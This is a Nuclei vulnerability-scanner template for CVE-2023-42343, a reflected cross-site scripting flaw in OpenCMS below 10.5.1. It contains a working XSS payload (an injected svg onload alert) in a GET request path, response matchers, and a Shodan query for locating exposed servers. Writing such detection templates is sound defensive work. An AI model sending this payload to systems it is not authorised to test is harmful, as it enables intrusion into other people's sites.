nuclei-templates/http/cves/2023/CVE-2023-42343.yaml

33 lines
823 B
YAML

id: CVE-2023-42343
info:
name: OpenCMS - Cross-Site Scripting
author: DhiyaneshDK
severity: medium
description: |
OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.
remediation: Fixed in 10.5.1.
reference:
- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
classification:
cve-id: CVE-2023-42343
metadata:
max-request: 1
shodan-query: "/opencms/"
verified: true
tags: cve,cve2023,xss,opencms
http:
- method: GET
path:
- '{{BaseURL}}/opencms/cmisatom/cmis-online/type?id=1%27"><svg%20onload=alert(document.domain)>'
headers:
Content-Type: application/cmisquery+xml
matchers:
- type: word
words:
- 'Apache Chemistry OpenCMIS'
- '<svg onload=alert(document.domain)>'
part: body